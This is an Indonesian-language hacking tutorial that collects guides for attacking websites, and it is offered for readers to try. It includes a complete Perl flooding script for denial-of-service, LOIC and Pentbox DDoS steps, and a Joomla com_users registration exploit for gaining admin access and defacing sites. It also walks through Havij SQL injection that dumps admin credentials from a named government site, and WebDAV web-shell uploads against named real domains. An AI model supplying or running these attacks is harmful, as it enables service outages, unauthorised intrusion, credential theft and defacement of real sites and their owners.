DDOS With LOIC

Saya akan share tutorial DDOS with LOIC

Alat yang dibutuhkan :
1. Exploit Joomla
2. Website yag vuln

langkah-langkah

1. Download file LOIC, ekstrak dikomputer anda, lalu jalankan program. (Jika gagal dibuka mungkin anda harus mengupgrade aplikasi .net framework pada komputer anda).
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang (misalkan: http://www.Test.com, lalu klik lock on).
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested dan failed.

Cara melakukan Ddos Attack dengan LOIC

Kedua cara serangan Dos diatas adalah cara yang sederhana namun besar sekali efeknya, selain cara itu ada juga serangan Dos dengan membanjiri Ping melalui command promt dari komputer. Silahkan cari referensi tentang variasi perintah-perintahnya di internet, namun menurut saya hal itu kurang praktis, dan jarang dipakai orang, yang paling banyak dipakai adalah dengan menggunakan booter atau apliaksi dari komputer.

Selamat mencoba !

DDOS With Perl

Kita akan belajar membuat DDOS Perl. DDOS ini sebenarnya sederhana namun sangat ampuh dan efektif saya pernah mengalami kehebatan DDOS yang satu ini. Ketika saya gunakan DDOS Perl baru saya buka 4, satu warnet sudah error semuanya. Itu karena DDOS menghisap habis akses internet di jaringan tersebut.

Trik ini sederhana dan saya juga masih belajar. Jangan malu berbagi dengan hal-hal kecil karena hal-hal yang besar bermula dari hal yang kecil. Ilmu yang kita jangan disombongkan tetapi untuk diamalkan.

Alat yang dibutuhkan :

- Active Perl
- Target IP

Okeh langsung saja

Siapkan notepad start>all program>accesories>notepad
Copy script yang ada dibawah ini

#bitte kein weiterverkauf an andere, danke lg ja0
use IO::Socket;

system ('cls');
system ('title DDOS');
print "\a
----------------------
:::DDoS by Muhammad Syahid
----------------------
\n";

print "\nSo Funktionierts, Das programm fragt dich nach den Hostnamen od. Ip addresse und dan nach den Port (standartmäßig 80), Dan das protocol TCP oder UDP, Wen du beides benötigst gib TCP,UDP ein. \n\n";

system ('PAUSE');
system ('cls');

print "\nHost:\a";
chomp ($host = <STDIN>);

system ('cls');

print "\nPort:\a";
chomp ($port = <STDIN>);

system ('cls');

print "\nProtokol (TCP oder. UDP):\a";
chomp ($proto = <STDIN>);

{

$sock = IO::Socket::INET->new(Proto=>"$proto", PeerAddr=>"$host", PeerPort=>"$port") || die "\nCould not connect to the remote machine. Either the machine is offline or the port is not in use on the selected protocol.\a";

}

Packets:
while (1) {
$size = rand() * 8921873 * 9991988;
print ("Flooding: $host:$port~$proto Packets Sent: $size\n");
send($sock, 0, $size)

}

Kamu tinggal edit target.ip,dan portnya sendiri
Kamu juga bisa mengganti nama yang ada tersebut dengan nama kamu
Terakhir simpan dengan format pl. Contoh MyDDOS.pl

DDOS With Ruby

Alat yang dibutuhkan :

• Pentbox-1.5-win
• Rubyinstaller-2.0.0-p247

langkah-langkah :

1. Install rubyinstaller
2. Jalankan pentbox.rb
3. Lalu pilih: "2-network tools"
                   "1-net dos tester"

selatjutnya pilih sendiri :)

Deface With Com_User

Cara deface web dengan metode Com_User/Exploit Joomla - Com_User adalah Teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di seluruh Indonesia. Com_User / Teknik Exploit joomla ini bisa di gunakan untuk web yang menggunakan joomla versi 1.6/ 1.7.3/ 2.5.

Alat yang dibutuhkan :
1. Exploit Joomla
2. Website yag vuln

Langkah-Langkah

1. Cari web target.

2. Open link in new tab, semua web yang muncul di hasil pencarian google. karena tidak semua web bisa.
3. Cari web yang vuln.

Gambar diatas merupakan site Vuln.

Gambar diatas merupakan site "Joomla yang samar-samar".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomlanya."

*Web yang saya namakan "samar-samar" itu bukan berarti sitenya tidak tidak bisa di deface/ tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 5% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.

*Pastikan Web yang anda ingin deface adalah web yang vuln. karena web yang vuln 60% nya bisa di deface.

4. Setelah menemukan site yang vuln. masukkan exploit berikut di belakang sitenya

index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://www.ssjuvestabia.it. maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://www.ssjuvestabia.it/index.php?option=com_users&view=registration

5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.

6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.

7. Cari kode hidden (dengan ctrl+f )dan cari kode seperti gambar di bawah ini. 

8. Copy code yang di beri kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.

9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut contoh: http://www.ssjuvestabia.it/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.

*Jangan lupa ganti alamat email dan username nya (terserah kamu )

*Password dibiarkan berbeda

10. Save file tersebut.

11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )

12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.

13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol register yang terdapat di bagian bawah.

14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

15. Ganti password tersebut (terserah anda) dan klik register kembali.

16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.

17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)

*misal alamat web nya adalah http://www.ssjuvestabia.it/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://www.ssjuvestabia.it/administrator/

18. Setelah itu anda masukkan username dan password, lalu login.

19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

*Ada 4 kemungkinan GAGAL untuk web yang vuln:

1. Web telah menghapus laman Registration Form.

2. Alamat Activation Link tidak masuk kedalam email.
3. User sudah diaktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut.

4. Template tidak bisa di di ubah.

Paling sering GAGAL pada nomor 2

Deface With Havij

Cara Deface Website Dengan Menggunakan Tools Havij

Alat yang dibutuhkan :

- Havij
- Website yang vuln

Download Tools Havijnya
Lalu Extract Filenya
Kemudian Double Klik Icon Havijnya
Selesai.
1). Kalo Tools Havijnya sudah terinstal, buka tools tersebut dengan cara double click.

2). Nah, sekarang kita cari targetnya.

3). Jika target sudah dapat, saya ambil contoh http://www.dephut.go.id/index.php?q=hotspot&hid=2054

4). Kita masukkan target tersebut kedalam kolom target No 1, terus liat dilangkah No 2, terlihatkan nama databasenya, kemudian kalo udah berhasil klik table yang sudah saya tandai dengan nomer No 3.

5). Kalo sudah sobat klik, maka tampilannya akan seperti dibawah ini. Lalu kalo sudah, sobat klik lagi Get Tables, liat nih gambar dibawah.

6). Akan ada banyak sekali table-table yang terbuka. Terus ayo kita tebak dimana letak admin & passwordnya berada. Saya menebak kalo user dan passwordnya ada ditable web_users. Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik GetColoums yang terletak disebelah Get Tables yang saya tandai degan No 2.

7). Selanjutnya tinggal sobat centang data yang ingin sobat ambil. Saya tandai dengan No 1, lalu klik Get Data, Kemudian kita lihat apa yang terjadi.

8). Ayeee, keliatankan user sama passwordnya, tapi masih terenkripsi dengan MD5. Cara mengenkripsinya mudah kok, karena tools ini juga menyediakan enkripsi untuk MD5.

9). Yang paling penting sobat tinggal mencari halaman login adminnya, Sobat hanya perlu mengklik Icon yang berjudul Find Admin, kemudian tunggu hingga muncul tulisan I'm IDLE.

Deface With Webdav

Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.

Sebelumnya soba harus mendowload tools Webdav Shell Maker'nya.
Alat yang dibutuhkan :

• Webdav Shell Maker
• Website yang vuln

Tutorial Deface Web dengan Webdav Shell Maker :
1). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.

2). Buka menu Setting, pada menu setting Name of your shell bisa diubah dengan nama kamu, kemudian Load Shell from file, pilih shell Umer.asp;

3). Selanjutnya, pilih Add site, disini saya menggunakan target http://fpzbtc.com/ lalu klik OK.

4). Klik Serang !!!, lalu tunggu hingga scanning web selesai, jika shell berhasil tertanam, tampilannya akan seperti ini, klik OK.

5). Block http://fpzbtc.com/Cirebon.asp;.txt lalu Copy dan Pastekan pada Addressbar Browser kalian, kemudian tekan Enter.

6). Jika sudah masuk website target, klik UPLOAD FILE TO Blablabla,

7). Pilih scipt .html deface'an kamu, kemudian klik Upload!

8). Tahap akhir, copy file .html yang sudah kamu upload tadi lalu pastekan dibelakang Url website target.

9). Enter dan lihat hasilnya!

http://fpzbtc.com/3xpl0iter.html

Jika ingin mendeface seluruh halaman, kamu tinggal RENAME file kamu dengan Index.html, atau istilahnya tukar-menukar file .html ( Cari file bernama Index.html atau sejenisnya, delete file tersebut lalu Rename file upload'an kamu menjadi Index.html ) Gimana, ngerti ngga? harus ngerti!